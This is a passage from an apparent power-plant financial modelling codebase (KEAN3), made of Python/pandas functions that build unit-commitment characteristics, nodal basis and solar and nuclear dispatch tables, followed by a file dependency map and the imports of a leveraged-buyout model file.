hl_temp_ready_to_kean_df['characteristic'] = 'high_load'
hl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hl_temp_ready_to_kean_df)
""" max_load """
max_load_summer = row['Summer Duct Capacity']
max_load_winter = row['Winter Duct Capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, max_load_summer, max_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'max_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" min_load """
min_load_summer = row['Summer Base Capacity'] * row['Lower Operating Limit - Capacity']
min_load_winter = row['Winter Base Capacity'] * row['Lower Operating Limit - Capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, min_load_summer, min_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'min_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" offpeak_power_hub_instrument_id """
offpeak_power_hub_instrument_id = row['Power Hub - Off Peak']
oph_temp_ready_to_kean_df = temp_ready_to_kean_df
oph_temp_ready_to_kean_df['value_str'] = offpeak_power_hub_instrument_id
oph_temp_ready_to_kean_df['value'] = 0.0
oph_temp_ready_to_kean_df['characteristic'] = 'offpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(oph_temp_ready_to_kean_df)
""" onpeak_power_hub_instrument_id """
onpeak_power_hub_instrument_id = row['Power Hub - On Peak']
onph_temp_ready_to_kean_df = temp_ready_to_kean_df
onph_temp_ready_to_kean_df['value_str'] = onpeak_power_hub_instrument_id
onph_temp_ready_to_kean_df['value'] = 0.0
onph_temp_ready_to_kean_df['characteristic'] = 'onpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(onph_temp_ready_to_kean_df)
""" outage_days """
outage_start_date = row['Planned Outage Start Date']
outage_end_date = row['Planned Outage End Date']
od_temp_ready_to_kean_df = temp_ready_to_kean_df
od_temp_ready_to_kean_df['value'] = od_temp_ready_to_kean_df.apply(lambda row: get_outage_days(row, outage_start_date, outage_end_date), axis=1)
od_temp_ready_to_kean_df['value_str'] = ''
od_temp_ready_to_kean_df['characteristic'] = 'outage_days'
total_plant_temp_df = total_plant_temp_df.append(od_temp_ready_to_kean_df)
""" dafault to 0s """
for char in ['ramp_dowm_cold_hours', 'ramp_down_warm_hours', 'ramp_energy_cold', 'ramp_energy_warm', 'ramp_fuel_warm', 'ramp_up_warm_hours']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = 0.0
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
""" ramp_fuel_cold """
ramp_fuel_cold_summer = row['Start Fuel (MMBtu/MW)'] * row['Summer Duct Capacity']
ramp_fuel_cold_winter = row['Start Fuel (MMBtu/MW)'] * row['Winter Duct Capacity']
rfc_temp_ready_to_kean_df = temp_ready_to_kean_df
rfc_temp_ready_to_kean_df['value'] = rfc_temp_ready_to_kean_df.apply(lambda row: get_load(row, ramp_fuel_cold_summer, ramp_fuel_cold_winter), axis=1)
rfc_temp_ready_to_kean_df['value_str'] = ''
rfc_temp_ready_to_kean_df['characteristic'] = 'ramp_fuel_cold'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" ramp_up_cold_hours """
ramp_up_cold_hours = row['Start Hours']
ruch_temp_ready_to_kean_df = temp_ready_to_kean_df
ruch_temp_ready_to_kean_df['value'] = ramp_up_cold_hours
ruch_temp_ready_to_kean_df['value_str'] = ''
ruch_temp_ready_to_kean_df['characteristic'] = 'ramp_up_cold_hours'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" start_cost """
start_cost_summer = row['Start Expense ($/MW)'] * row['Summer Duct Capacity']
start_cost_winter = row['Start Expense ($/MW)'] * row['Winter Duct Capacity']
sc_temp_ready_to_kean_df = temp_ready_to_kean_df
sc_temp_ready_to_kean_df['value'] = sc_temp_ready_to_kean_df.apply(lambda row: get_load(row, start_cost_summer, start_cost_winter), axis=1)
sc_temp_ready_to_kean_df['value_str'] = ''
sc_temp_ready_to_kean_df['characteristic'] = 'start_cost'
total_plant_temp_df = total_plant_temp_df.append(sc_temp_ready_to_kean_df)
""" units """
u_temp_char_df = temp_ready_to_kean_df
u_temp_char_df['value'] = 1
u_temp_char_df['value_str'] = ''
u_temp_char_df['characteristic'] = 'units'
total_plant_temp_df = total_plant_temp_df.append(u_temp_char_df)
""" vom_high_load vom_max_load vom_min_load """
vom = row['VOM']
for char in ['vom_high_load', 'vom_max_load', 'vom_min_load']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = temp_char_df.apply(lambda row: get_escalated_value(vom, escalation, row['period']), axis=1)
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
total_plant_temp_df['entity'] = plant_name
total_plant_temp_df['unit'] = 'all'
total_plant_temp_df['scenario'] = scenario
total_plant_temp_df['version'] = version
ready_to_kean_pcuc_df = ready_to_kean_pcuc_df.append(total_plant_temp_df)
return ready_to_kean_pcuc_df
def convert_uc_dataframe(powerplant_df, technology_df, scenario, version, start_date, end_date, escalation=0.02):
month_list = get_month_list(start_date, end_date)
merged_simple_uc_df = pd.merge(powerplant_df, technology_df, left_on='technology', right_on='name', how="left")
ready_to_kean_pcuc_df = pd.DataFrame()
for index, row in merged_simple_uc_df.iterrows():
plant_name = row['name_x']
total_plant_temp_df = pd.DataFrame()
temp_ready_to_kean_df = pd.DataFrame(data=month_list, columns=['period'])
""" emissions """
emissions = row['carbon_cost'] * row['emissions_rate'] / 2000.0
if row['market'] == 'CAISO':
emissions = row['carbon_cost'] * row['emissions_rate'] / 2205.0
emissions_temp_ready_to_kean_df = temp_ready_to_kean_df
emissions_temp_ready_to_kean_df['characteristic'] = 'emissions'
emissions_temp_ready_to_kean_df['value'] = emissions_temp_ready_to_kean_df.apply(lambda row: get_escalated_value(emissions, escalation, row['period']), axis=1)
emissions_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(emissions_temp_ready_to_kean_df)
""" forced_outage_value """
forced_outage_value = row['uof']
fov_temp_ready_to_kean_df = temp_ready_to_kean_df
fov_temp_ready_to_kean_df['characteristic'] = 'forced_outage_value'
fov_temp_ready_to_kean_df['value'] = forced_outage_value
fov_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(fov_temp_ready_to_kean_df)
""" fuel_transport """
fuel_transport_summer = row['summer_fuel_basis']
fuel_transport_winter = row['winter_fuel_basis']
ftp_temp_ready_to_kean_df = temp_ready_to_kean_df
ftp_temp_ready_to_kean_df['characteristic'] = 'fuel_transport'
ftp_temp_ready_to_kean_df['value'] = ftp_temp_ready_to_kean_df.apply(lambda row: get_load(row, fuel_transport_summer, fuel_transport_winter), axis=1)
ftp_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ftp_temp_ready_to_kean_df)
""" fuel_type """
fuel_type = row['fuel_type']
ft_temp_ready_to_kean_df = temp_ready_to_kean_df
ft_temp_ready_to_kean_df['characteristic'] = 'fuel_type'
ft_temp_ready_to_kean_df['value'] = 0.0
ft_temp_ready_to_kean_df['value_str'] = fuel_type
total_plant_temp_df = total_plant_temp_df.append(ft_temp_ready_to_kean_df)
""" gas_instrument_id """
gas_instrument_id = row['fuel_hub']
gii_temp_ready_to_kean_df = temp_ready_to_kean_df
gii_temp_ready_to_kean_df['characteristic'] = 'gas_instrument_id'
gii_temp_ready_to_kean_df['value'] = 0.0
gii_temp_ready_to_kean_df['value_str'] = gas_instrument_id
total_plant_temp_df = total_plant_temp_df.append(gii_temp_ready_to_kean_df)
""" heatrate_high_load """
heatrate_high_load_summer = row['summer_base_heatrate']
heatrate_high_load_winter = row['winter_base_heatrate']
hhl_temp_ready_to_kean_df = temp_ready_to_kean_df
hhl_temp_ready_to_kean_df['value'] = hhl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_high_load_summer, heatrate_high_load_winter), axis=1)
hhl_temp_ready_to_kean_df['characteristic'] = 'heatrate_high_load'
hhl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hhl_temp_ready_to_kean_df)
""" heatrate_max_load """
heatrate_max_load_summer = row['summer_duct_heatrate']
heatrate_max_load_winter = row['winter_duct_heatrate']
hml_temp_ready_to_kean_df = temp_ready_to_kean_df
hml_temp_ready_to_kean_df['value'] = hml_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_max_load_summer, heatrate_max_load_winter), axis=1)
hml_temp_ready_to_kean_df['characteristic'] = 'heatrate_max_load'
hml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hml_temp_ready_to_kean_df)
""" heatrate_min_load """
heatrate_min_load_summer = row['summer_base_heatrate'] * row['lol_summer_heatrate']
heatrate_min_load_winter = row['winter_base_heatrate'] * row['lol_winter_heatrate']
hminl_temp_ready_to_kean_df = temp_ready_to_kean_df
hminl_temp_ready_to_kean_df['value'] = hminl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_min_load_summer, heatrate_min_load_winter), axis=1)
hminl_temp_ready_to_kean_df['characteristic'] = 'heatrate_min_load'
hminl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hminl_temp_ready_to_kean_df)
""" high_load """
high_load_summer = row['summer_base_capacity']
high_load_winter = row['winter_base_capacity']
hl_temp_ready_to_kean_df = temp_ready_to_kean_df
hl_temp_ready_to_kean_df['value'] = hl_temp_ready_to_kean_df.apply(lambda row: get_load(row, high_load_summer, high_load_winter), axis=1)
hl_temp_ready_to_kean_df['characteristic'] = 'high_load'
hl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hl_temp_ready_to_kean_df)
""" max_load """
max_load_summer = row['summer_duct_capacity']
max_load_winter = row['winter_duct_capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, max_load_summer, max_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'max_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" min_load """
min_load_summer = row['summer_base_capacity'] * row['lol_capacity']
min_load_winter = row['winter_base_capacity'] * row['lol_capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, min_load_summer, min_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'min_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" offpeak_power_hub_instrument_id """
offpeak_power_hub_instrument_id = row['power_hub_off_peak']
oph_temp_ready_to_kean_df = temp_ready_to_kean_df
oph_temp_ready_to_kean_df['value_str'] = offpeak_power_hub_instrument_id
oph_temp_ready_to_kean_df['value'] = 0.0
oph_temp_ready_to_kean_df['characteristic'] = 'offpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(oph_temp_ready_to_kean_df)
""" onpeak_power_hub_instrument_id """
onpeak_power_hub_instrument_id = row['power_hub_on_peak']
onph_temp_ready_to_kean_df = temp_ready_to_kean_df
onph_temp_ready_to_kean_df['value_str'] = onpeak_power_hub_instrument_id
onph_temp_ready_to_kean_df['value'] = 0.0
onph_temp_ready_to_kean_df['characteristic'] = 'onpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(onph_temp_ready_to_kean_df)
""" outage_days """
outage_start_date = row['first_plan_outage_start']
outage_end_date = row['first_plan_outage_end']
od_temp_ready_to_kean_df = temp_ready_to_kean_df
od_temp_ready_to_kean_df['value'] = od_temp_ready_to_kean_df.apply(lambda row: get_outage_days(row, outage_start_date, outage_end_date), axis=1)
od_temp_ready_to_kean_df['value_str'] = ''
od_temp_ready_to_kean_df['characteristic'] = 'outage_days'
total_plant_temp_df = total_plant_temp_df.append(od_temp_ready_to_kean_df)
""" dafault to 0s """
for char in ['ramp_dowm_cold_hours', 'ramp_down_warm_hours', 'ramp_energy_cold', 'ramp_energy_warm', 'ramp_fuel_warm', 'ramp_up_warm_hours']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = 0.0
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
""" ramp_fuel_cold """
ramp_fuel_cold_summer = row['start_fuel'] * row['summer_duct_capacity']
ramp_fuel_cold_winter = row['start_fuel'] * row['winter_duct_capacity']
rfc_temp_ready_to_kean_df = temp_ready_to_kean_df
rfc_temp_ready_to_kean_df['value'] = rfc_temp_ready_to_kean_df.apply(lambda row: get_load(row, ramp_fuel_cold_summer, ramp_fuel_cold_winter), axis=1)
rfc_temp_ready_to_kean_df['value_str'] = ''
rfc_temp_ready_to_kean_df['characteristic'] = 'ramp_fuel_cold'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" ramp_up_cold_hours """
ramp_up_cold_hours = row['start_hours']
ruch_temp_ready_to_kean_df = temp_ready_to_kean_df
ruch_temp_ready_to_kean_df['value'] = ramp_up_cold_hours
ruch_temp_ready_to_kean_df['value_str'] = ''
ruch_temp_ready_to_kean_df['characteristic'] = 'ramp_up_cold_hours'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" start_cost """
start_cost_summer = row['start_expense'] * row['summer_duct_capacity']
start_cost_winter = row['start_expense'] * row['winter_duct_capacity']
sc_temp_ready_to_kean_df = temp_ready_to_kean_df
sc_temp_ready_to_kean_df['value'] = sc_temp_ready_to_kean_df.apply(lambda row: get_load(row, start_cost_summer, start_cost_winter), axis=1)
sc_temp_ready_to_kean_df['value_str'] = ''
sc_temp_ready_to_kean_df['characteristic'] = 'start_cost'
total_plant_temp_df = total_plant_temp_df.append(sc_temp_ready_to_kean_df)
""" units """
u_temp_char_df = temp_ready_to_kean_df
u_temp_char_df['value'] = 1
u_temp_char_df['value_str'] = ''
u_temp_char_df['characteristic'] = 'units'
total_plant_temp_df = total_plant_temp_df.append(u_temp_char_df)
""" vom_high_load vom_max_load vom_min_load """
vom = row['vom']
for char in ['vom_high_load', 'vom_max_load', 'vom_min_load']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = temp_char_df.apply(lambda row: get_escalated_value(vom, escalation, row['period']), axis=1)
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
total_plant_temp_df['entity'] = plant_name
total_plant_temp_df['unit'] = 'all'
total_plant_temp_df['scenario'] = scenario
total_plant_temp_df['version'] = version
ready_to_kean_pcuc_df = ready_to_kean_pcuc_df.append(total_plant_temp_df)
return ready_to_kean_pcuc_df
def load_pp_tech_info(plant_tech_master_file):
simple_uc_df = pd.read_excel(plant_tech_master_file, sheet_name='Simple UC')
tech_df = pd.read_excel(plant_tech_master_file, sheet_name='Tech')
""" powerplant table """
simple_uc_df.rename(columns={'Plant':'name',
'Tech':'technology',
'Fuel Type':'fuel_type',
'Market':'market',
'Power Hub/Zone':'power_zone',
'Power Hub - On Peak':'power_hub_on_peak',
'Power Hub - Off Peak':'power_hub_off_peak',
'Power Hub - SNL':'power_hub',
'Node':'node',
'Fuel Zone':'fuel_zone',
'Fuel Hub':'fuel_hub',
'Summer Fuel Basis ($/MMBtu)':'summer_fuel_basis',
'Winter Fuel Basis ($/MMBtu)':'winter_fuel_basis',
'Summer Duct Capacity':'summer_duct_capacity',
'Summer Base Capacity':'summer_base_capacity',
'Winter Duct Capacity':'winter_duct_capacity',
'Winter Base Capacity':'winter_base_capacity',
'Planned Outage Start Date':'first_plan_outage_start',
'Planned Outage End Date':'first_plan_outage_end',
'Carbon Cost ($/Ton)':'carbon_cost',
'Retirement Date':'retirement_date',
'Ownership':'ownership',
'Source Notes':'source_notes'}, inplace=True)
# simple_uc_df.to_csv("simple_uc_df.csv")
simple_uc_df['retirement_date'] = simple_uc_df.apply(lambda row: date(2099,12,31) if pd.isnull(row['retirement_date']) else row['retirement_date'], axis=1)
simple_uc_df['second_plan_outage_start'] = ''
simple_uc_df['second_plan_outage_end'] = ''
simple_uc_df['effective_start'] = date(2000,1,1)
simple_uc_df['effective_end'] = date(2099,12,31)
ready_to_kean_pp_df = simple_uc_df
""" technology table """
tech_df.rename(columns={'Tech': 'name',
'Summer Duct Heat Rate': 'summer_duct_heatrate',
'Summer Base Heat Rate': 'summer_base_heatrate',
'Winter Duct Heat Rate': 'winter_duct_heatrate',
'Winter Base Heat Rate': 'winter_base_heatrate',
'Lower Operating Limit - Capacity': 'lol_capacity',
'Lower Operating Limit - Summer Heat Rate': 'lol_summer_heatrate',
'Lower Operating Limit - Winter Heat Rate': 'lol_winter_heatrate',
'Start Expense ($/MW)': 'start_expense',
'Start Fuel (MMBtu/MW)': 'start_fuel',
'Start Hours': 'start_hours',
'Emissions Rate (lb/MMBtu)': 'emissions_rate',
'VOM': 'vom',
'UOF': 'uof'}, inplace=True)
tech_df = tech_df.set_index('name')
tech_df.fillna(0.0, inplace=True)
tech_df = tech_df.reset_index()
ready_to_kean_tech_df = tech_df
return ready_to_kean_pp_df, ready_to_kean_tech_df
def get_match_signal(row):
if np.isnan(row['total_lmp_x']) or np.isnan(row['total_lmp_y']):
return 'Not matched'
return 'Matched'
def get_month(row):
return row['delivery_date'].month
def calculate_basis(nodal_market, nodal_id, hub_market, hub_id, start_date, end_date, dart, plant_name):
nodal_lmp_df = get_historical_lmp(nodal_market, nodal_id, start_date, end_date, dart)
hub_lmp_df = get_historical_lmp(hub_market, hub_id, start_date, end_date, dart)
# nodal_lmp_df.to_csv("nodal_lmp_df.csv")
# hub_lmp_df.to_csv("hub_lmp_df.csv")
print ("------------------------------------------------")
print (nodal_market, nodal_id, len(nodal_lmp_df))
print (hub_market, hub_id, len(hub_lmp_df))
merged_hub_nodal_lmp_df = pd.merge(nodal_lmp_df, hub_lmp_df, on=['delivery_date','hour_ending'], how='inner')
# merged_hub_nodal_lmp_df.to_csv("merged_hub_nodal_lmp_df.csv")
merged_hub_nodal_lmp_df['signal'] = merged_hub_nodal_lmp_df.apply(lambda row: get_match_signal(row), axis=1)
merged_hub_nodal_lmp_df.rename(columns={'total_lmp_x':'nodal_lmp','total_lmp_y':'hub_lmp', 'peak_info_x': 'peak_info'}, inplace=True)
merged_hub_nodal_lmp_df['month'] = merged_hub_nodal_lmp_df.apply(lambda row: get_month(row), axis=1)
merged_hub_nodal_lmp_df = merged_hub_nodal_lmp_df[['delivery_date','hour_ending', 'month', 'nodal_lmp','hub_lmp','signal', 'peak_info']]
merged_hub_nodal_lmp_df['basis_$'] = (merged_hub_nodal_lmp_df['nodal_lmp'] - merged_hub_nodal_lmp_df['hub_lmp'])
merged_hub_nodal_lmp_df['basis_%'] = (merged_hub_nodal_lmp_df['nodal_lmp'] - merged_hub_nodal_lmp_df['hub_lmp']) / merged_hub_nodal_lmp_df['hub_lmp']
merged_hub_nodal_lmp_df['basis_$'] = merged_hub_nodal_lmp_df.apply(lambda row: np.nan if abs(row['basis_%']) > 0.5 else row['basis_$'], axis=1)
merged_hub_nodal_lmp_df['basis_%'] = merged_hub_nodal_lmp_df.apply(lambda row: np.nan if abs(row['basis_%']) > 0.5 else row['basis_%'], axis=1)
merged_hub_nodal_lmp_df = merged_hub_nodal_lmp_df.replace([np.inf, -np.inf], 0.0)
# merged_hub_nodal_lmp_df.to_csv("result.csv")
merged_hub_nodal_lmp_df['plant'] = plant_name
monthly_onoffpeak_basis_df = merged_hub_nodal_lmp_df.groupby(['month','peak_info'])[['basis_$','basis_%']].mean()
monthly_onoffpeak_basis_df['plant'] = plant_name
return monthly_onoffpeak_basis_df, merged_hub_nodal_lmp_df
def load_solar_dispatch(portfolio, scenario, version, plant_name, assumptions_file):
solar_assumptions_df = pd.read_excel(assumptions_file, sheet_name='kean_load_solar')
plant_assumptions_df = solar_assumptions_df.loc[solar_assumptions_df.plant == plant_name]
melt_plant_assumptions_df = pd.melt(plant_assumptions_df, id_vars=['plant','fsli'],
value_vars=[item for item in list(plant_assumptions_df.columns) if item not in ['plant','fsli']],
var_name='period',
value_name='value')
melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
melt_plant_assumptions_df = melt_plant_assumptions_df[['plant','fsli','period','value']]
melt_plant_assumptions_df = pd.pivot_table(melt_plant_assumptions_df, index=['plant','period'], columns=['fsli'], values='value', aggfunc=np.sum)
melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
melt_plant_assumptions_df['Generation'] = melt_plant_assumptions_df['ICAP'] * (melt_plant_assumptions_df['Hours - On Peak'] + melt_plant_assumptions_df['Hours - Off Peak']) * melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Generation - On Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - On Peak'] * melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Generation - Off Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - Off Peak'] * melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Energy Revenue'] = melt_plant_assumptions_df['Generation'] * melt_plant_assumptions_df['PPA']
melt_plant_assumptions_df['Realized Power Price - Off Peak'] = melt_plant_assumptions_df['PPA']
melt_plant_assumptions_df['Realized Power Price - On Peak'] = melt_plant_assumptions_df['PPA']
melt_plant_assumptions_df['Capacity Factor - On Peak'] = melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Capacity Factor - Off Peak'] = melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Delivered Fuel Expense'] = 0.0
melt_plant_assumptions_df['Variable O&M Expense'] = 0.0
melt_plant_assumptions_df['Net Emissions Expense'] = 0.0
# solar_dispatch_df = melt_plant_assumptions_df
melt_plant_assumptions_df.to_csv("tttt.csv")
# solar_dispatch_df.to_csv("solar_dispatch_df.csv")
solar_dispatch_df = pd.melt(melt_plant_assumptions_df,id_vars=['plant','period'],
value_vars=[item for item in list(melt_plant_assumptions_df.columns) if item not in ['plant','period']],
var_name='fsli',
value_name='value')
solar_dispatch_df = solar_dispatch_df.reset_index()
solar_dispatch_df['company'] = portfolio
solar_dispatch_df['entity'] = solar_dispatch_df['plant']
solar_dispatch_df['scenario'] = scenario
solar_dispatch_df['version'] = version
solar_dispatch_df = solar_dispatch_df[['company','scenario','version','entity','fsli','period','value']]
# solar_dispatch_df.to_csv("solar_dispatch_df.csv")
return solar_dispatch_df
def load_nuclear_dispatch(portfolio, scenario, version, plant_name, assumptions_file):
nuclear_assumptions_df = pd.read_excel(assumptions_file, sheet_name='kean_load_nuclear')
plant_assumptions_df = nuclear_assumptions_df.loc[nuclear_assumptions_df.plant == plant_name]
melt_plant_assumptions_df = pd.melt(plant_assumptions_df, id_vars=['plant','fsli'],
value_vars=[item for item in list(plant_assumptions_df.columns) if item not in ['plant','fsli']],
var_name='period',
value_name='value')
melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
melt_plant_assumptions_df = melt_plant_assumptions_df[['plant','fsli','period','value']]
melt_plant_assumptions_df = pd.pivot_table(melt_plant_assumptions_df, index=['plant','period'], columns=['fsli'], values='value', aggfunc=np.sum)
melt_plant_assumptions_df = melt_plant_assumptions_df.reset_index()
melt_plant_assumptions_df['Generation'] = melt_plant_assumptions_df['ICAP'] * (melt_plant_assumptions_df['Hours - On Peak'] + melt_plant_assumptions_df['Hours - Off Peak']) * melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Generation - On Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - On Peak'] * melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Generation - Off Peak'] = melt_plant_assumptions_df['ICAP'] * melt_plant_assumptions_df['Hours - Off Peak'] * melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Energy Revenue - On Peak'] = melt_plant_assumptions_df['Generation - On Peak'] * (melt_plant_assumptions_df['Hub Price - On Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - On Peak']))
melt_plant_assumptions_df['Energy Revenue - Off Peak'] = melt_plant_assumptions_df['Generation - Off Peak'] * (melt_plant_assumptions_df['Hub Price - Off Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - Off Peak']))
melt_plant_assumptions_df['Energy Revenue'] = melt_plant_assumptions_df['Energy Revenue - On Peak'] + melt_plant_assumptions_df['Energy Revenue - Off Peak']
melt_plant_assumptions_df['Delivered Fuel Expense'] = melt_plant_assumptions_df['Generation'] * melt_plant_assumptions_df['Fuel Costs']
melt_plant_assumptions_df['Variable O&M Expense'] = melt_plant_assumptions_df['Generation'] * melt_plant_assumptions_df['VOM']
melt_plant_assumptions_df['Net Emissions Expense'] = 0.0
melt_plant_assumptions_df['Realized Power Price - Off Peak'] = melt_plant_assumptions_df['Hub Price - Off Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - Off Peak'])
melt_plant_assumptions_df['Realized Power Price - On Peak'] = melt_plant_assumptions_df['Hub Price - On Peak'] * ( 1 + melt_plant_assumptions_df['Basis_% - On Peak'])
melt_plant_assumptions_df['Capacity Factor - On Peak'] = melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df['Capacity Factor - Off Peak'] = melt_plant_assumptions_df['Capacity Factor']
melt_plant_assumptions_df.rename(columns={'Hours - On Peak':'on_hours','Hours - Off Peak':'off_hours'}, inplace=True)
# solar_dispatch_df = melt_plant_assumptions_df
# melt_plant_assumptions_df.to_csv("tttt.csv")
# sys.exit()
# solar_dispatch_df.to_csv("solar_dispatch_df.csv")
nuclear_dispatch_df = pd.melt(melt_plant_assumptions_df,id_vars=['plant','period'],
value_vars=[item for item in list(melt_plant_assumptions_df.columns) if item not in ['plant','period']],
var_name='fsli',
value_name='value')
nuclear_dispatch_df = nuclear_dispatch_df.reset_index()
nuclear_dispatch_df['company'] = portfolio
nuclear_dispatch_df['entity'] = nuclear_dispatch_df['plant']
nuclear_dispatch_df['scenario'] = scenario
nuclear_dispatch_df['version'] = version
nuclear_dispatch_df = nuclear_dispatch_df[['company','scenario','version','entity','fsli','period','value']]
return nuclear_dispatch_df
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,753 | changliukean/KEAN3 | refs/heads/master | /model/andrew_sample.py | #TODO: Add check to see if revolver draw necessary
#TODO: Add check to see if need to go below target working capital to make DSC
#TODO: Add Act/360 day_count_factor to utilities
#TODO: Add proper calc of average daily balance for Revolver (lc fees, ununused lines, interest expense)
#TODO: Modify ptd calcs to allow for non-calendar year end payment periods
#TODO: Fix InterestRateSwaps in instruments module - calc correct interest payment
#TODO: Build Interest Expense support report
#TODO: Build PTD support report
#TODO: Add forecasted capex to PTD calculation
#TODO: If have multiple DSRAs, each is only valid for its own instrumnet (pari passu solves it?)
#TODO: Fix ptd cleanup to correct for lack of cash to make full payment
import os
import sys
from pathlib import Path
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
path_utilities = path + '/utility/'
sys.path.insert(0, path_utilities)
import utilities as utils
import instruments as ins
path_test = path + '/test/'
sys.path.insert(0, path_test)
from lbo_waterfall_scenarios import get_cap_structure, get_waterfall, get_portfolio
from lbo_reports import create_lbo_support_report, create_waterfall_report
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
import pandas as pd
import numpy as np
